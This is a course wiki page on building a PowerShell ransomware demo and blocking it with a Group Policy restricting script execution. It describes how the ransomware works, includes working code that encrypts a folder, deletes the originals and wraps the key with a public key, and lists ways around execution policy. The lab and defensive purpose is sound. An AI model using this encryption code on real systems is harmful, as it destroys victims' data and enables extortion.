Project 3: Ransomware and Mitigation - LouisNajdek/sec440 GitHub Wiki
RANSOMWARE SCRIPT DEMO LINK
RANSOMWARE MITIGATION DEMO LINK
Ransomware Scripts Creation:
Encryption Script
The encryption script begins by downloading two tools, GnuPG and the Posh-SSH PowerShell module. GnuPG performs the actual file encryption (symmetric, passphrase-based), and Posh-SSH is used to SCP the symmetric key and the list of encrypted files back to the attacker. Within the script, each original file is deleted and replaced with its encrypted .gpg copy. The victim then has to pay the attacker, who SCPs the symmetric key and the encrypted file list back over. The script throws many errors but otherwise does run. The script could not be configured to wrap the symmetric key with the attacker's public key (the hybrid scheme real ransomware uses, where only the holder of the matching private key can recover the symmetric key), so instead the symmetric key is SCP'd back to the attacker immediately and deleted from the victim PC. A message notifies the user that their files have been encrypted and that they must make a payment to a (fake) bitcoin address.
Sources for information in the script are in Louis Najdek's reflection.
Decryption Script
The decryption script requires the symmetric key and the encrypted file list in order to function. With both, it decrypts each listed .gpg file back to its original contents and then removes the encrypted copies by deleting all files with the .gpg extension. A message then notifies the user that their files have been decrypted.
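The two scripts described above, reduced to the gpg calls that matter, as an added example that is not the wiki's code: it encrypts everything in one lab directory with a random AES-256 passphrase, wraps that passphrase with a public key (the step the encryption script could not do), and then reverses both. gpg.exe on PATH, the C:\LabFiles folder and the attacker@example.com key pair are assumptions; the download, the Posh-SSH transfer and the ransom message are left out. Removing an original only when gpg exits 0 is the check a script that "throws many errors" needs so that a failed encryption does not destroy data.

```powershell
# Added example, not the wiki's script: a GnuPG encrypt/decrypt round trip confined to one
# lab directory. Assumes gpg.exe is on PATH and that a key pair for the hypothetical
# recipient below is in the local keyring (public key to wrap, private key to unwrap).
$LabDir      = 'C:\LabFiles'            # assumption: a throwaway lab folder, never a profile
$WrappedKey  = Join-Path $LabDir 'session.key.gpg'
$RecipientId = 'attacker@example.com'   # hypothetical key in the keyring

function New-SessionKey {
    # 32 bytes from the OS CSPRNG, base64-encoded so gpg can take it as a passphrase.
    $bytes = New-Object byte[] 32
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    return [Convert]::ToBase64String($bytes)
}

function Invoke-GpgSymmetric {
    # Runs gpg with the passphrase on stdin (fd 0) rather than on the command line,
    # so it never appears in a process listing. Returns $true when gpg exits 0.
    param([string]$Passphrase, [string[]]$GpgArgs)
    $Passphrase | & gpg --batch --yes --pinentry-mode loopback --passphrase-fd 0 @GpgArgs
    return ($LASTEXITCODE -eq 0)
}

function Protect-LabFiles {
    # Encrypts every file under $Dir with AES-256. The original is removed only after
    # gpg succeeds, so a failed run leaves the data intact.
    param([string]$Dir, [string]$Passphrase)
    Get-ChildItem -Path $Dir -File -Recurse |
        Where-Object { $_.Extension -ne '.gpg' } |
        ForEach-Object {
            $src = $_.FullName
            $ok = Invoke-GpgSymmetric $Passphrase @('--symmetric', '--cipher-algo', 'AES256', '--output', "$src.gpg", $src)
            if ($ok) { Remove-Item -LiteralPath $src } else { Write-Warning "gpg failed on $src; original kept" }
        }
}

function Protect-SessionKey {
    # The hybrid step the wiki's script lacks: wrap the passphrase with the recipient's
    # public key, so only the holder of the matching private key can recover it.
    param([string]$Passphrase)
    $Passphrase | & gpg --batch --yes --trust-model always --encrypt --recipient $RecipientId --output $WrappedKey
    return ($LASTEXITCODE -eq 0)
}

function Unprotect-SessionKey {
    # Needs the recipient's private key in the keyring; gpg writes the passphrase to stdout.
    return (& gpg --batch --quiet --decrypt $WrappedKey)
}

function Unprotect-LabFiles {
    # Decrypts each .gpg file back to its original name; ciphertext is removed only on success.
    param([string]$Dir, [string]$Passphrase)
    Get-ChildItem -Path $Dir -File -Recurse -Filter '*.gpg' |
        Where-Object { $_.FullName -ne $WrappedKey } |
        ForEach-Object {
            $src = $_.FullName
            $out = $src -replace '\.gpg$', ''
            $ok = Invoke-GpgSymmetric $Passphrase @('--decrypt', '--output', $out, $src)
            if ($ok) { Remove-Item -LiteralPath $src } else { Write-Warning "gpg failed on $src; ciphertext kept" }
        }
}

# Round trip: encrypt the lab files, wrap the key, then recover the key and decrypt.
$pass = New-SessionKey
Protect-LabFiles -Dir $LabDir -Passphrase $pass
Protect-SessionKey -Passphrase $pass
$pass = Unprotect-SessionKey
Unprotect-LabFiles -Dir $LabDir -Passphrase $pass
```

Because the passphrase is sent over stdin and the same pipe is used for both directions, the round trip is consistent even though PowerShell appends a newline to what it pipes. `--trust-model always` is what lets `--encrypt` use an imported public key in batch mode without first marking it trusted.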
Ransomware Mitigation Process
In order to mitigate a Windows PowerShell script ransomware attack, the mgmt VM had to be prepared. Mgmt is a Windows Server machine with Server Manager. To build the mitigation, mgmt had to become a domain controller running Active Directory Domain Services (AD DS). This was done by going into the "Manage" menu and selecting "Add Roles and Features". From there, select the current machine (mgmt, which is listed by its hostname) and in the Server Roles section select "Active Directory Domain Services". This adds everything the role needs. Select Install and let it finish. Installing the role alone does not complete the job, because one more step is needed: promoting mgmt to a domain controller. During the promotion you are required to create a new forest, and the forest root domain you name there is the domain that users and computers will belong to. Name it whatever you want; the convention in this lab is yourname.local. Follow the promotion wizard (it will also ask for a Directory Services Restore Mode password), then restart mgmt. This restart is important.

After the restart, log back in as the domain administrator and go to the "Tools" menu, then select "Active Directory Users and Computers". This is where users are added to the domain. In the Users container, right-click, select New -> User, and fill in the name, username and password as you see fit. Keep in mind that, for now, these users have to be added to the Administrators group to be able to log in at the mgmt console, because domain users are not granted "Allow log on locally" on a domain controller by default. That is a lab shortcut: on a real network you would test on a domain-joined workstation rather than give users administrative rights on the domain controller.

Next, add an Organizational Unit (OU). OUs are containers that Group Policy can be linked to, so rules and policies can be applied to the objects in one OU and not to others. Right-click the yourname.local domain node, select New -> Organizational Unit, and name it something like "Protected Users" (Active Directory also has a built-in security group of that name; the OU is unrelated to it). When done, move the newly created user into this OU. Then go back to Server Manager.
Select "Tools" and then "Group Policy Management". This is where the mitigation rule is applied. In the window that opens, right-click the "Protected Users" OU and choose "Create a GPO in this domain, and Link it here...". Name the new GPO "Restricted Powershell Scripts", then right-click it and select Edit. In the Group Policy Management Editor go to User Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows PowerShell and open "Turn on Script Execution". Setting this to Disabled sets the PowerShell execution policy to Restricted at the UserPolicy scope, which prevents any .ps1 script from running for the users in that OU. It cannot be undone with Set-ExecutionPolicy or with powershell.exe -ExecutionPolicy Bypass, because the Group Policy scopes take precedence over the process, user and machine scopes. Apply the change and close the windows. Because this is a User Configuration setting it follows the user object: the account must be inside the OU, and the policy takes effect at the next logon or after gpupdate /force.

To test whether it worked, log out, log in as the protected user, and attempt to run a simple PowerShell script. Get-ExecutionPolicy -List should show Restricted for UserPolicy, and the script should fail with "running scripts is disabled on this system", while the same script runs under a user outside the OU. This is how we mitigated a PowerShell script ransomware attack.

One caveat: Microsoft documents the execution policy as a safety feature, not a security boundary. It governs only script files, so a user, or malware already running as that user, can still paste the same commands at the prompt, pipe the file's contents into powershell.exe -Command -, or pass them with -EncodedCommand. Treat this GPO as protection against accidental or casual script execution, and pair it with application control such as AppLocker or Windows Defender Application Control for real enforcement.
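The whole mitigation above (AD DS role, promotion, OU, user, GPO, verification) as an added example done from PowerShell instead of Server Manager. This is not the wiki's own procedure; it assumes Windows Server with the ActiveDirectory and GroupPolicy modules, and yourname.local, "Protected Users" and the user name tuser are placeholders taken from or added to the text.

```powershell
# Added example, not the wiki's own steps: the same domain controller, OU, test user and
# GPO built from an elevated PowerShell on mgmt instead of Server Manager. Assumes Windows
# Server with the ActiveDirectory and GroupPolicy modules (installed by
# -IncludeManagementTools); yourname.local, "Protected Users" and tuser are placeholders.

# 1. Install AD DS and promote mgmt to the first domain controller of a new forest.
#    Install-ADDSForest reboots the server when it finishes; continue after logging back in.
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName 'yourname.local' -InstallDns -Force `
    -SafeModeAdministratorPassword (Read-Host 'DSRM password' -AsSecureString)

# ---- after the reboot, logged on as the domain Administrator ----
Import-Module ActiveDirectory, GroupPolicy
$DomainDN = (Get-ADDomain).DistinguishedName   # DC=yourname,DC=local
$OuName   = 'Protected Users'                  # the wiki's OU name; unrelated to the
                                               # built-in "Protected Users" security group
New-ADOrganizationalUnit -Name $OuName -Path $DomainDN
$OuDN = "OU=$OuName,$DomainDN"

# 2. Create the test user directly inside the OU, so no separate move is needed.
New-ADUser -Name 'Test User' -SamAccountName 'tuser' -Path $OuDN -Enabled $true `
    -AccountPassword (Read-Host 'Password for tuser' -AsSecureString)
# Lab shortcut from the wiki so tuser can log on at the DC console: domain users are not
# granted "Allow log on locally" on a domain controller. Not production practice.
Add-ADGroupMember -Identity 'Administrators' -Members 'tuser'

# 3. Create the GPO, link it to the OU, and set "Turn on Script Execution" to Disabled.
#    The GUI writes EnableScripts=0 under the user policy key; that value is what makes
#    Get-ExecutionPolicy report Restricted at the UserPolicy scope.
$GpoName = 'Restricted Powershell Scripts'
New-GPO -Name $GpoName | New-GPLink -Target $OuDN -LinkEnabled Yes | Out-Null
Set-GPRegistryValue -Name $GpoName -Key 'HKCU\Software\Policies\Microsoft\Windows\PowerShell' `
    -ValueName 'EnableScripts' -Type DWord -Value 0 | Out-Null

# 4. Verify the link and the registry value from the admin session.
Get-GPInheritance -Target $OuDN | Select-Object -ExpandProperty GpoLinks
Get-GPRegistryValue -Name $GpoName -Key 'HKCU\Software\Policies\Microsoft\Windows\PowerShell'

# 5. Then, logged on as tuser (after gpupdate /force or a fresh logon):
#    Get-ExecutionPolicy -List                  -> UserPolicy : Restricted
#    .\test.ps1                                 -> "running scripts is disabled on this system"
#    Set-ExecutionPolicy Bypass -Scope Process  -> warning that a policy at a more specific scope overrides it
```

Step 5 is the same test the wiki performs by hand; the Set-ExecutionPolicy line is worth running once to see for yourself that the per-user policy wins over the process scope. A user outside the OU gets no UserPolicy entry and the script runs.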